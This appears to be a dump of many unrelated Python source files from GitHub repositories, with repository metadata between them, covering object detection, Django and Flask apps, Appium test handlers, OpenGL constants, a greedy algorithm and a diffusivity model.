# and gather predictions from output layers
outs = self.net.forward(self.get_output_layers(self.net))
# initialization
class_ids = []
confidences = []
boxes = []
centroids = []
conf_threshold = 0.3
nms_threshold = 0.1
# For each detetion from each output layer get the confidence, class id, bounding box params and ignore weak detections (confidence < 0.5)
for out in outs:
for detection in out:
scores = detection[5:]
class_id = np.argmax(scores)
confidence = scores[class_id]
if confidence > conf_threshold:
center_x = int(detection[0] * W)
center_y = int(detection[1] * H)
w = int(detection[2] * W)
h = int(detection[3] * H)
x = center_x - w / 2
y = center_y - h / 2
class_ids.append(class_id)
confidences.append(float(confidence))
boxes.append([x, y, w, h])
centroids.append((center_x, center_y))
# Apply non-max suppression to prevent duplicate detections
indices = cv2.dnn.NMSBoxes(boxes, confidences, conf_threshold, nms_threshold)
# Go through the detections remaining after NMS and draw bounding boxes
detections = []
frame = img.copy()
for i in indices:
i = i[0]
box = boxes[i]
x = box[0]
y = box[1]
w = box[2]
h = box[3]
self.draw_bounding_box(frame, class_ids[i], confidences[i], round(x), round(y), round(x + w), round(y + h))
detections.append((self.classes[class_ids[i]], centroids[i], box))
print("Detected Objects: ", detections)
return detections, frame
if __name__ == "__main__":
img = cv2.imread('sample_img.png')
imgProc = ImgProc()
imgProc.detect_objects(img)
|
[
"66690702+github-classroom[bot]@users.noreply.github.com"
] |
66690702+github-classroom[bot]@users.noreply.github.com
|
fc65babef9b7d7077b94f35d2c17bcd73e6ea202
|
ac305c6739541e84857e297f8eb1b19417978548
|
/78.py
|
669cd4df43e886cd23adf6230f54103530d8dd28
|
[] |
no_license
|
imhardikj/git_test
|
d6608d6c02e0bc454f9dd31ffbbc5704a7046a61
|
43f0de2e9ac09ecd4fdfee27879fd8ae354a0685
|
refs/heads/master
| 2020-03-27T21:56:46.394739 | 2018-09-03T11:27:58 | 2018-09-03T11:27:58 | 147,189,474 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 135 |
py
|
def greet_user(username):
"""Display a simple greeting."""
print("Hello, " + username.title() + "!")
greet_user('jesse')
|
[
"[email protected]"
] | |
b92c943549a132c92ed17f40a08639a3e024897f
|
106983cf0b8df622f514ecff2bb2fa4c794c9dac
|
/Misc/Raspberry Pi Things/Motors/stringComparison.py
|
c9d425c4e5b4eeabd02957268eb17c72dcf90889
|
[] |
no_license
|
michael5486/Senior-Design
|
2d9ae521c637abf7c0825f85b32752ad61c62744
|
6b6c78bed5f20582a9753a9c10020c709d6b6e53
|
refs/heads/master
| 2021-01-19T09:58:35.378164 | 2017-05-26T17:17:13 | 2017-05-26T17:17:13 | 67,556,475 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 179 |
py
|
testVar = None
run = True
while run == 1:
testVar = raw_input("Ask user for something.\n")
if testVar == "exit":
run = False
print "System Exiting..."
else:
print testVar
|
[
"[email protected]"
] | |
5b9c1aae3f26483755e82ecbe9dbc62f68a649ff
|
9a343c495459e79dc408a102730bcaeac7fa8886
|
/chapter9/SuperMattAdmin/ModelForm/urls.py
|
e330642ce8f8b5b0fcd8f30304a21a71719bd6f6
|
[
"MIT"
] |
permissive
|
MMingLeung/Python_Study
|
62d3ae92bf6760de0804aa5792f53fb3799486a2
|
4ff1d02d2b6dd54e96f7179fa000548936b691e7
|
refs/heads/master
| 2022-12-27T12:53:05.186800 | 2018-03-07T04:34:36 | 2018-03-07T04:34:36 | 92,124,981 | 3 | 1 |
MIT
| 2021-06-10T18:35:33 | 2017-05-23T03:28:52 |
JavaScript
|
UTF-8
|
Python
| false | false | 1,316 |
py
|
"""ModelForm URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url,include
from django.contrib import admin
from app01 import views
from supermatt.service import test_v1
urlpatterns = [
# url(r'^admin/', admin.site.urls),
# include 如果参数是模块路径,导入模块找urlpatterns变量,获取列表
# url(r'^test/$', include('app01.urls')),
# 可以这样写
# url(r'^test/$', ([
# url(r'^test/', views.test),
# url(r'^test/', views.test),
# url(r'^test/', views.test),
# ],'app_name','name_space')),
url(r'^su/', test_v1.site.urls),
url(r'^test/', views.test),
url(r'^test2/', views.test2),
]
|
[
"[email protected]"
] | |
a14a08ab5d69e160bff8619e5fa0c565a6878d76
|
03b30e760f571e309ab1539edbc24ce0ff47c141
|
/cyly/test1.py
|
0ee1339e5bbd9f9f590df225b40d8211bac483c9
|
[] |
no_license
|
latata666/newcoder
|
548f32ab3acd75b592ce7f7b399ecdf340e747d8
|
e9206ab924899a2985bece312777e3b5d55c6f60
|
refs/heads/master
| 2022-12-12T22:46:03.255804 | 2020-08-31T02:27:17 | 2020-08-31T02:27:17 | 263,274,517 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 876 |
py
|
# -*- coding: utf-8 -*-
# @Time : 2020/5/15 10:41
# @Author : Mamamooo
# @Site :
# @File : test1.py
# @Software: PyCharm
"""
"""
import logging
# create logger with 'spam_application'
logger = logging.getLogger('spam_application')
logger.setLevel(logging.DEBUG)
# create file handler which logs even debug messages
fh = logging.FileHandler('spam.log')
fh.setLevel(logging.DEBUG)
# create console handler with a higher log level
ch = logging.StreamHandler()
ch.setLevel(logging.ERROR)
# create formatter and add it to the handlers
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
ch.setFormatter(formatter)
# add the handlers to the logger
logger.addHandler(fh)
logger.addHandler(ch)
logger.info('creating an instance of auxiliary_module.Auxiliary')
logger.info('done with auxiliary_module.some_function()')
|
[
"[email protected]"
] | |
856e9c0036931f4496353a90a125e2e2e94829e8
|
95aa5a5c10ad18195d7f92e37265d9dff06debe6
|
/synapse/tools/server.py
|
55efd5ecbd42ae28f7f5bd3ea0aa56bb306baf18
|
[
"Apache-2.0"
] |
permissive
|
drstrng/synapse
|
2679f7c23221ad7d8fd2fbb4745bdcd5275843da
|
3901f17601821aa0e8b6de4de434309d465fbba2
|
refs/heads/master
| 2021-01-17T22:02:29.833824 | 2015-09-01T18:56:57 | 2015-09-01T18:56:57 | 40,968,669 | 0 | 0 | null | 2015-08-18T11:40:51 | 2015-08-18T11:40:50 |
Python
|
UTF-8
|
Python
| false | false | 1,358 |
py
|
import sys
import argparse
import importlib
import synapse.link as s_link
import synapse.cortex as s_cortex
import synapse.daemon as s_daemon
def main(argv):
p = argparse.ArgumentParser(prog='server')
p.add_argument('--initmod',help='python module name for daemon init callback')
p.add_argument('--cortex', action='append', default=[], help='cortex name,url to share for RMI')
p.add_argument('linkurl',nargs='+',help='link urls to bind/listen')
opts = p.parse_args(argv)
daemon = s_daemon.Daemon()
# possibly load/share a cortex or two
for nameurl in opts.cortex:
name,url = nameurl.split(',',1)
core = s_cortex.openurl(url)
daemon.addSharedObject(name,core)
# fire up requested link servers
for url in opts.linkurl:
link = s_link.chopLinkUrl(url)
daemon.runLinkServer(link)
if opts.initmod:
mod = importlib.import_module(opts.initmod)
meth = getattr(mod,'initDaemon',None)
if meth == None:
print('error: initmod (%s) has no initDaemon() function!')
return
# call back the daemon init module
meth(daemon)
try:
daemon.wait()
except KeyboardInterrupt as e:
print('ctrl-c caught: shutting down')
daemon.fini()
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
[
"[email protected]"
] | |
83fb210fa070a1486e7d0d70933f5079a00249e4
|
82fce9aae9e855a73f4e92d750e6a8df2ef877a5
|
/Lab/venv/lib/python3.8/site-packages/OpenGL/raw/GLES2/EXT/sRGB.py
|
8f6425aa57802b0bcff7a9f104b0879ff0ac08bc
|
[] |
no_license
|
BartoszRudnik/GK
|
1294f7708902e867dacd7da591b9f2e741bfe9e5
|
6dc09184a3af07143b9729e42a6f62f13da50128
|
refs/heads/main
| 2023-02-20T19:02:12.408974 | 2021-01-22T10:51:14 | 2021-01-22T10:51:14 | 307,847,589 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 648 |
py
|
'''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p
from OpenGL.constant import Constant as _C
# Code generation uses this
# End users want this...
from OpenGL.raw.GLES2 import _errors
_EXTENSION_NAME = 'GLES2_EXT_sRGB'
def _f(function):
return _p.createFunction(function, _p.PLATFORM.GLES2, 'GLES2_EXT_sRGB', error_checker=_errors._error_checker)
GL_FRAMEBUFFER_ATTACHMENT_COLOR_ENCODING_EXT = _C('GL_FRAMEBUFFER_ATTACHMENT_COLOR_ENCODING_EXT', 0x8210)
GL_SRGB8_ALPHA8_EXT = _C('GL_SRGB8_ALPHA8_EXT', 0x8C43)
GL_SRGB_ALPHA_EXT = _C('GL_SRGB_ALPHA_EXT', 0x8C42)
GL_SRGB_EXT=_C('GL_SRGB_EXT',0x8C40)
|
[
"[email protected]"
] | |
ce7936e9279838ce773a5d1c8ec644b1ab44048f
|
ce55c319f5a78b69fefc63595d433864a2e531b5
|
/前后端分离-vue-DRF/Projects-lenongke/LNK/apps/users/signals.py
|
43a056d613cf142a3a112d980f3a8db7cfac5f0d
|
[] |
no_license
|
Suijng/1809_data
|
a072c875e8746190e3b715e53f1afe3323f4666b
|
45f8a57089f5c30ccc1a3cddb03b76dc95355417
|
refs/heads/master
| 2022-12-21T12:38:30.458291 | 2019-09-27T01:14:41 | 2019-09-27T01:14:41 | 211,207,071 | 0 | 0 | null | 2022-11-22T03:16:18 | 2019-09-27T00:55:21 |
HTML
|
UTF-8
|
Python
| false | false | 579 |
py
|
# post_save Django中的model对象保存后,自动触发
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.contrib.auth import get_user_model
# 获取用户模型
User = get_user_model()
@receiver(post_save,sender=User) # 监控用户User模型
def create_user(sender,instance=None,created=False,**kwargs):
# created: 表示是否已经创建
if created:
# 获取用户的密码
password = instance.password
# 加密
instance.set_password(password)
# 保存
instance.save()
|
[
"[email protected]"
] | |
99bdd4f3712583d0eca467f97b1c076141596f60
|
7edafb8e10c31bffd12420a4cee61d0a841fd226
|
/YunluFramework/public/handle/renmai/RENMAIHANDLE5.py
|
c53467af7c700dc0002bde67039eec60351ee5c0
|
[] |
no_license
|
xiao2912008572/Appium
|
ca11d2cf82f9dcc051e9b719eb09f862f07621bf
|
3931957a8ae9b4ee2acc13ae4aba0ba46b6d842b
|
refs/heads/master
| 2021-01-21T12:27:36.243484 | 2018-09-12T09:25:35 | 2018-09-12T09:25:35 | 102,071,447 | 8 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 9,492 |
py
|
__author__ = 'Administrator'
from YunluFramework.public.handle.renmai.RENMAIHANDLE4 import RENMAIHANDLE4
class RENMAIHANDLE5(RENMAIHANDLE4):
#*********************************【PAGE4】人脉首页-搜索-标签列表-点击进入群聊-设置:RMSY_search_label_groupchat_menu_setting*********************************
#定位:人脉首页-搜索-标签列表-点击进入群聊-设置-群头像:点击
def RMSY_search_label_groupchat_menu_setting_grouphead_click(self):
return self.p.click(self.RMSY_search_label_groupchat_menu_setting_grouphead)
#定位:人脉首页-搜索-标签列表-点击进入群聊-设置-返回:点击
def RMSY_search_label_groupchat_menu_setting_back_click(self):
return self.p.click(self.RMSY_search_label_groupchat_menu_setting_back)
#定位:人脉首页-搜索-标签列表-点击进入群聊-设置-群名称:点击
def RMSY_search_label_groupchat_menu_setting_groupname_click(self):
return self.p.click(self.RMSY_search_label_groupchat_menu_setting_groupname)
#*********************************【PAGE4】人脉首页-搜索-标签列表-点击进入群聊-热度设置:RMSY_search_label_groupchat_menu_heatsetting*********************************
#定位:人脉首页-搜索-标签列表-点击进入群聊-热度设置-返回:点击
def RMSY_search_label_groupchat_menu_heatsetting_back_click(self):
return self.p.click(self.RMSY_search_label_groupchat_menu__heatsetting_back)
#定位:人脉首页-搜索-标签列表-点击进入群聊-热度设置-消息:点击
def RMSY_search_label_groupchat_menu_heatsetting_msg_click(self):
return self.p.click(self.RMSY_search_label_groupchat_menu__heatsetting_msg)
#定位:人脉首页-搜索-标签列表-点击进入群聊-热度设置-飘泡:点击
def RMSY_search_label_groupchat_menu_heatsetting_bubble_click(self):
return self.p.click(self.RMSY_search_label_groupchat_menu__heatsetting_bubble)
#定位:人脉首页-搜索-标签列表-点击进入群聊-热度设置-震动:点击
def RMSY_search_label_groupchat_menu_heatsetting_shock_click(self):
return self.p.click(self.RMSY_search_label_groupchat_menu__heatsetting_shock)
#定位:人脉首页-搜索-标签列表-点击进入群聊-热度设置-铃声:点击
def RMSY_search_label_groupchat_menu_heatsetting_bell_click(self):
return self.p.click(self.RMSY_search_label_groupchat_menu__heatsetting_bell)
#定位:人脉首页-搜索-标签列表-点击进入群聊-热度设置-确定:点击
def RMSY_search_label_groupchat_menu_heatsetting_confirm_click(self):
return self.p.click(self.RMSY_search_label_groupchat_menu__heatsetting_confirm)
#定位:人脉首页-搜索-标签列表-点击进入群聊-热度设置-周期:点击
def RMSY_search_label_groupchat_menu_heatsetting_period_click(self):
return self.p.click(self.RMSY_search_label_groupchat_menu__heatsetting_period)
#定位:人脉首页-搜索-标签列表-点击进入群聊-热度设置-时段:点击
def RMSY_search_label_groupchat_menu_heatsetting_time_click(self):
return self.p.click(self.RMSY_search_label_groupchat_menu__heatsetting_time)
#*********************************【PAGE4】人脉首页-搜索-标签列表-点击进入群聊-人群按钮:RMSY_search_label_groupchat_groupbtn*********************************
#定位:人脉首页-搜索-标签列表-点击进入群聊-人群按钮-返回:点击
def RMSY_search_label_groupchat_groupbtn_back_click(self):
return self.p.click(self.RMSY_search_label_groupchat_groupbtn_back)
#定位:人脉首页-搜索-标签列表-点击进入群聊-人群按钮-联系人列表:点击
def RMSY_search_label_groupchat_groupbtn_Contacts_click(self, n):
return self.p.clicks(self.RMSY_search_label_groupchat_groupbtn_Contacts,n)
#定位:人脉首页-搜索-标签列表-点击进入群聊-人群按钮-消息输入框:输入
def RMSY_search_label_groupchat_groupbtn_msginput_sendkeys(self, msg):
return self.p.send_keys(self.RMSY_search_label_groupchat_groupbtn_msginput, msg)
#定位:人脉首页-搜索-标签列表-点击进入群聊-人群按钮-消息按钮:点击
def RMSY_search_label_groupchat_groupbtn_msgbtn_click(self):
return self.p.click(self.RMSY_search_label_groupchat_groupbtn_msgbtn)
#*********************************【PAGE3】人脉首页-点击联系人-打开主菜单-热度设置-一对一会话-周期:RMSY_contacts_menu_heatsetting_p2pconversation_period*********************************
#定位:人脉首页-点击联系人-打开主菜单-热度设置-一对一会话-周期-返回:点击
def RMSY_contacts_menu_heatsetting_p2pconversation_period_back_click(self):
return self.p.click(self.RMSY_contacts_menu_heatsetting_p2pconversation_period_back)
#定位:人脉首页-点击联系人-打开主菜单-热度设置-一对一会话-周期-每天:点击
def RMSY_contacts_menu_heatsetting_p2pconversation_period_everyday_click(self):
return self.p.click(self.RMSY_contacts_menu_heatsetting_p2pconversation_period_everyday)
#定位:人脉首页-点击联系人-打开主菜单-热度设置-一对一会话-周期-工昨日:点击
def RMSY_contacts_menu_heatsetting_p2pconversation_period_workday_click(self):
return self.p.click(self.RMSY_contacts_menu_heatsetting_p2pconversation_period_workday)
#定位:人脉首页-点击联系人-打开主菜单-热度设置-一对一会话-周期-节假日:点击
def RMSY_contacts_menu_heatsetting_p2pconversation_period_holiday_click(self):
return self.p.click(self.RMSY_contacts_menu_heatsetting_p2pconversation_period_holiday)
#定位:人脉首页-点击联系人-打开主菜单-热度设置-一对一会话-周期-择日:点击
def RMSY_contacts_menu_heatsetting_p2pconversation_period_selectday_click(self):
return self.p.click(self.RMSY_contacts_menu_heatsetting_p2pconversation_period_selectday)
#定位:人脉首页-点击联系人-打开主菜单-热度设置-一对一会话-周期-保存:点击
def RMSY_contacts_menu_heatsetting_p2pconversation_period_save_click(self):
return self.p.click(self.RMSY_contacts_menu_heatsetting_p2pconversation_period_save)
#*********************************【PAGE3】人脉首页-点击联系人-打开主菜单-热度设置-一对一会话-时段:RMSY_contacts_menu_heatsetting_p2pconversation_time*********************************
#定位:人脉首页-点击联系人-打开主菜单-热度设置-一对一会话-时段-确定:点击
def RMSY_contacts_menu_heatsetting_p2pconversation_time_confirm_click(self):
return self.p.click(self.RMSY_contacts_menu_heatsetting_p2pconversation_time_confirm)
#定位:人脉首页-点击联系人-打开主菜单-热度设置-一对一会话-时段-取消:点击
def RMSY_contacts_menu_heatsetting_p2pconversation_time_cancel_click(self):
return self.p.click(self.RMSY_contacts_menu_heatsetting_p2pconversation_time_cancel)
#*********************************【PAGE3】人脉首页-点击联系人-消息-热度设置-周期:RMSY_contacts_msg_menu_heatsetting_period*********************************
#定位:人脉首页-点击联系人-消息-热度设置-周期-返回:点击
def RMSY_contacts_msg_menu_heatsetting_period_back_click(self):
return self.p.click(self.RMSY_contacts_msg_menu_heatsetting_period_back)
#定位:人脉首页-点击联系人-消息-热度设置-周期-每天:点击
def RMSY_contacts_msg_menu_heatsetting_period_everyday_click(self):
return self.p.click(self.RMSY_contacts_msg_menu_heatsetting_period_everyday)
#定位:人脉首页-点击联系人-消息-热度设置-周期-工昨日:点击
def RMSY_contacts_msg_menu_heatsetting_period_workday_click(self):
return self.p.click(self.RMSY_contacts_msg_menu_heatsetting_period_workday)
#定位:人脉首页-点击联系人-消息-热度设置-周期-节假日:点击
def RMSY_contacts_msg_menu_heatsetting_period_holiday_click(self):
return self.p.click(self.RMSY_contacts_msg_menu_heatsetting_period_holiday)
#定位:人脉首页-点击联系人-消息-热度设置-周期-择日:点击
def RMSY_contacts_msg_menu_heatsetting_period_selectday_click(self):
return self.p.click(self.RMSY_contacts_msg_menu_heatsetting_period_selectday)
#定位:人脉首页-点击联系人-消息-热度设置-周期-保存:点击
def RMSY_contacts_msg_menu_heatsetting_period_save_click(self):
return self.p.click(self.RMSY_contacts_msg_menu_heatsetting_period_save)
#*********************************【PAGE4】人脉首页-点击联系人-消息-热度设置-时段:RMSY_contacts_msg_menu_heatsetting_time*********************************
#定位:人脉首页-点击联系人-消息-热度设置-时段-确定:点击
def RMSY_contacts_msg_menu_heatsetting_time_confirm_click(self):
return self.p.click(self.RMSY_contacts_msg_menu_heatsetting_time_confirm)
#定位:人脉首页-点击联系人-消息-热度设置-时段-取消:点击
def RMSY_contacts_msg_menu_heatsetting_time_cancel_click(self):
return self.p.click(self.RMSY_contacts_msg_menu_heatsetting_time_cancel)
|
[
"[email protected]"
] | |
1489a49a4e6ccd3697af23f1e682ca9574953838
|
efe6c52938fe5c7a259514ad317484057edfeff7
|
/tube/models.py
|
7526f1fa46150f5b12037f9489d41f329289eb0d
|
[] |
no_license
|
seiya0723/video_site_02
|
69413879248a2cc314dd5c83c9bedb564e170aba
|
5ffcccb1f64b83bb3bf1c9bfd42c9896ff28eb85
|
refs/heads/master
| 2023-03-31T21:02:25.877950 | 2021-04-14T00:45:14 | 2021-04-14T00:45:14 | 357,728,585 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 438 |
py
|
from django.db import models
from django.utils import timezone
class Video(models.Model):
class Meta:
db_table = "video"
title = models.CharField(verbose_name="タイトル", max_length=30)
comment = models.CharField(verbose_name="動画説明文", max_length=2000)
dt = models.DateTimeField(verbose_name="投稿日", default=timezone.now)
def __str__(self):
return self.title
|
[
"seiya@asahina"
] |
seiya@asahina
|
bfba43a40c44ed33df829ed9cd1755d9c69e70f7
|
736250d9d14552c5fa0aca25b25d9c8a28fcd1a0
|
/sssionpro/manage.py
|
3b9b39fa5263b2fcca0a11cb1b35b13a433a6d39
|
[] |
no_license
|
maheswatapradhan/feedback
|
57f052a2082902cb8a72b474e0b863b7a00d1c9c
|
31c7dcb113a38e29b3a56481fcb9ae2fce7d61a2
|
refs/heads/master
| 2020-09-15T23:42:32.041306 | 2019-11-23T12:54:25 | 2019-11-23T12:54:25 | 223,585,900 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 252 |
py
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "sssionpro.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
[
"[email protected]"
] | |
e5c3105a3f2f825626898ed2c619b599f820a0e9
|
f1a8e308c76866e2fba20401e6f1d5842dd60c46
|
/Algorithms and Data Structures Practice/LeetCode Questions/Greedy/TieRopes.py
|
0ca4144df73641761d8095f25ec57753846b4744
|
[] |
no_license
|
harman666666/Algorithms-Data-Structures-and-Design
|
6e5da0c1f701e7dfc7b045ecd1209463131d3fc7
|
483f0c93faca8ccaf038b77ebe2fa712f6b0c6bc
|
refs/heads/master
| 2021-07-14T10:11:27.588838 | 2021-07-07T01:47:42 | 2021-07-07T01:47:42 | 101,330,760 | 3 | 1 | null | 2018-10-15T04:52:07 | 2017-08-24T19:32:03 |
Python
|
UTF-8
|
Python
| false | false | 2,234 |
py
|
'''
There are N ropes numbered from 0 to N − 1, whose lengths are given in an array A, lying on the floor in a line. For each I (0 ≤ I < N), the length of rope I on the line is A[I].
We say that two ropes I and I + 1 are adjacent. Two adjacent ropes can be tied together with a knot, and the length of the tied rope is the sum of lengths of both ropes. The resulting new rope can then be tied again.
For a given integer K, the goal is to tie the ropes in such a way that the number of ropes whose length is greater than or equal to K is maximal.
For example, consider K = 4 and array A such that:
A[0] = 1
A[1] = 2
A[2] = 3
A[3] = 4
A[4] = 1
A[5] = 1
A[6] = 3
The ropes are shown in the figure below.
We can tie:
rope 1 with rope 2 to produce a rope of length A[1] + A[2] = 5;
rope 4 with rope 5 with rope 6 to produce a rope of length A[4] + A[5] + A[6] = 5.
After that, there will be three ropes whose lengths are greater than or equal to K = 4. It is not possible to produce four such ropes.
Write a function:
def solution(K, A)
that, given an integer K and a non-empty array A of N integers, returns the maximum number of ropes of length greater than or equal to K that can be created.
For example, given K = 4 and array A such that:
A[0] = 1
A[1] = 2
A[2] = 3
A[3] = 4
A[4] = 1
A[5] = 1
A[6] = 3
the function should return 3, as explained above.
Write an efficient algorithm for the following assumptions:
N is an integer within the range [1..100,000];
K is an integer within the range [1..1,000,000,000];
each element of array A is an integer within the range [1..1,000,000,000].
'''
# you can write to stdout for debugging purposes, e.g.
# print("this is a debug message")
def solution(K, A):
'''
Identify ropes that are smaller,
than K, and merge them together.
but dont merge with a rope that is already greater than K.
Or just look at first rope, if its less than K,
merge with right one,
'''
sum = 0
count = 0
for i in A:
if (sum + i) >= K:
count += 1
sum = 0
else:
sum += i
return count
|
[
"[email protected]"
] | |
685fda18ad8cf4719f324feb24e823122bb0d341
|
795df757ef84073c3adaf552d5f4b79fcb111bad
|
/stochastic_diffusion/diffusivity_1d_xk.py
|
62a6b21a6bbb4ecffa0bba1ee3ca9d405324092c
|
[] |
no_license
|
tnakaicode/jburkardt-python
|
02cb2f9ba817abf158fc93203eb17bf1cb3a5008
|
1a63f7664e47d6b81c07f2261b44f472adc4274d
|
refs/heads/master
| 2022-05-21T04:41:37.611658 | 2022-04-09T03:31:00 | 2022-04-09T03:31:00 | 243,854,197 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,885 |
py
|
#! /usr/bin/env python3
#
def diffusivity_1d_xk ( dc0, m, omega, n, x ):
#*****************************************************************************80
#
## DIFFUSIVITY_1D_XK evaluates a 1D stochastic diffusivity function.
#
# Discussion:
#
# The 1D diffusion equation has the form
#
# - d/dx ( DC(X) Del U(X) ) = F(X)
#
# where DC(X) is a function called the diffusivity.
#
# In the stochastic version of the problem, the diffusivity function
# includes the influence of stochastic parameters:
#
# - d/dx ( DC(XOMEGA) d/dx U(X) ) = F(X).
#
# In this function, the domain is assumed to be the unit interval [0.1].
#
#
# For DC0 = 1 and F(X) = 0, with boundary conditions U(0:OMEGA) = 0,
# U(1OMEGA) = 1, the exact solution is
#
# If OMEGA ~= 0:
#
# U(XOMEGA) = log ( 1 + OMEGA * X ) / log ( 1 + OMEGA )
#
# If OMEGA = 0:
#
# U(XOMEGA) = X
#
# In the numerical experiments described in the paper, OMEGA was taken
# to be a random variable with a Beta, or Uniform, or Gaussian or
# Poisson or Binomial distribution.
#
# For the Gaussian and Poisson distributions, the positivity requirement could not
# be guaranteed, and the experiments were simply made with a "small"
# variance of 0.1.
#
# Licensing:
#
# This code is distributed under the GNU LGPL license.
#
# Modified:
#
# 20 December 2009
#
# Author:
#
# John Burkardt
#
# Reference:
#
# Dongbin Xiu, George Karniadakis,
# Modeling uncertainty in steady state diffusion problems via
# generalized polynomial chaos,
# Computer Methods in Applied Mechanics and Engineering,
# Volume 191, 2002, pages 4927-4948.
#
# Parameters:
#
# Input, real DC0, the constant term in the expansion of the
# diffusion coefficient.
#
# Input, integer M, the number of stochastic parameters.
#
# Input, real OMEGA(M), the stochastic parameters.
#
# Input, integer N, the number of evaluation points.
#
# Input, real X(N), the point where the diffusion coefficient is to
# be evaluated.
#
# Output, real DC(N), the value of the diffusion coefficient at X.
#
import numpy as np
k = 0
w = 1.0
arg = np.zeros(n)
while ( k < m ):
if ( k < m ):
arg = arg + omega[k] * np.sin ( w * np.pi * x )
k = k + 1
if ( k < m ):
arg = arg + omega[k] * np.cos ( w * np.pi * x )
k = k + 1
w = w + 1.0
arg = np.exp ( - 0.125 ) * arg
dc = dc0 + np.exp ( arg )
return dc
def diffusivity_1d_xk_contour ( ):
#*****************************************************************************80
#
## diffusivity_1d_xk_contour displays contour plots of a 1D stochastic diffusivity function.
#
# Discussion:
#
# The diffusivity function is compute by DIFFUSIVITY_1D_XK.
#
# Licensing:
#
# This code is distributed under the GNU LGPL license.
#
# Modified:
#
# 08 February 2019
#
# Author:
#
# John Burkardt
#
# Reference:
#
# Dongbin Xiu, George Karniadakis,
# Modeling uncertainty in steady state diffusion problems via
# generalized polynomial chaos,
# Computer Methods in Applied Mechanics and Engineering,
# Volume 191, 2002, pages 4927-4948.
#
import matplotlib.pyplot as plt
import numpy as np
print ( '' )
print ( 'diffusivity_1d_xk_contour' )
print ( ' Display the stochastic diffusivity function' )
print ( ' defined by DIFFUSIVITY_1D_XK.' )
#
# Set the spatial grid.
#
n = 51
x_min = -1.0
x_max = +1.0
x = np.linspace ( x_min, x_max, n )
#
# Sample the OMEGA values.
# Use a seed of 0 for the MATLAB random number generator.
#
m = 5
omega = np.random.randn ( m )
#
# Compute the diffusivity field.
#
dc0 = 10.0
dc = diffusivity_1d_xk ( dc0, m, omega, n, x )
#
# Plot the diffusivity field.
#
plt.plot ( x, dc, linewidth = 2 )
plt.grid ( True )
plt.xlabel ( '<--- X --->' )
plt.ylabel ( 'DC(X)' )
plt.title ( 'XK Stochastic diffusivity function' )
filename = 'diffusivity_1d_xk.png'
plt.savefig ( filename )
print ( '' )
print ( ' Graphics saved as "%s".' % ( filename ) )
return
def diffusivity_1d_xk_test ( ):
#*****************************************************************************80
#
## diffusivity_1d_xk_test tests diffusivity_1d_xk.
#
# Licensing:
#
# This code is distributed under the GNU LGPL license.
#
# Modified:
#
# 08 February 2019
#
# Author:
#
# John Burkardt
#
# Parameters:
#
# None
#
import platform
print ( '' )
print ( 'diffusivity_1d_xk_test:' )
print ( ' Python version: %s' % ( platform.python_version ( ) ) )
print ( ' Test diffusivity_1d_xk.' )
diffusivity_1d_xk_contour ( )
#
# Terminate.
#
print ( '' )
print ( 'diffusivity_1d_xk_test:' )
print ( ' Normal end of execution.' )
return
if ( __name__ == '__main__' ):
from timestamp import timestamp
timestamp ( )
diffusivity_1d_xk_test ( )
timestamp ( )
|
[
"[email protected]"
] | |
f4f21fb5b2c269df3326b786e78e6edc3d4fb923
|
5b002b82b025ee371432b436a0c19b000a0df2dd
|
/setup.py
|
93cb4423f1905fc32138f022a24043d62d1e8831
|
[
"Apache-2.0"
] |
permissive
|
mvexel/whathappened
|
c5bfeeb1f41b20cd2f5f4c7782412a39090868b2
|
92805128d2a01909d89fca0650b585d8cac256e0
|
refs/heads/master
| 2021-01-19T09:10:53.189344 | 2017-04-10T00:05:24 | 2017-04-10T00:05:24 | 87,735,951 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 220 |
py
|
from setuptools import setup
setup(
name='whathappened',
packages=['whathappened'],
include_package_data=True,
install_requires=[
'flask',
'requests',
'gunicorn==19.7.0'
],
)
|
[
"[email protected]"
] | |
a1eeaddd15d2c948ed131f7a126f1ce98e9c1c6c
|
c8f023c1e2c9ecb9ffe328044ef3f013de0857a7
|
/src/apps/authentication/views.py
|
2523e22d739640c45818632c83a2d47a605d0269
|
[
"MIT"
] |
permissive
|
snicoper/django-boilerplate
|
851932459fca8b4a6c9220d8ad3ca8f94b14b7a2
|
88cc24c3a2e935fd1be139368288cae6c38679e4
|
refs/heads/master
| 2021-01-18T18:40:36.633342 | 2018-10-15T07:54:59 | 2018-10-15T07:54:59 | 29,604,293 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,839 |
py
|
from django.conf import settings
from django.contrib import messages
from django.contrib.auth import get_user_model, views
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.sites.shortcuts import get_current_site
from django.shortcuts import get_object_or_404, redirect, render
from django.urls import reverse, reverse_lazy
from django.utils.translation import ugettext as _
from django.views import generic
from utils.http import get_full_path
from utils.mail import send_templated_mail
from utils.mixins.views import AnonymousRequiredMixin
from .forms import AuthenticationForm, RegisterUserForm, UserEmailUpdateForm
from .models import RegisterUser, UserEmailUpdate
UserModel = get_user_model()
class RegisterUserFormView(AnonymousRequiredMixin, generic.CreateView):
template_name = 'authentication/register.html'
form_class = RegisterUserForm
model = RegisterUser
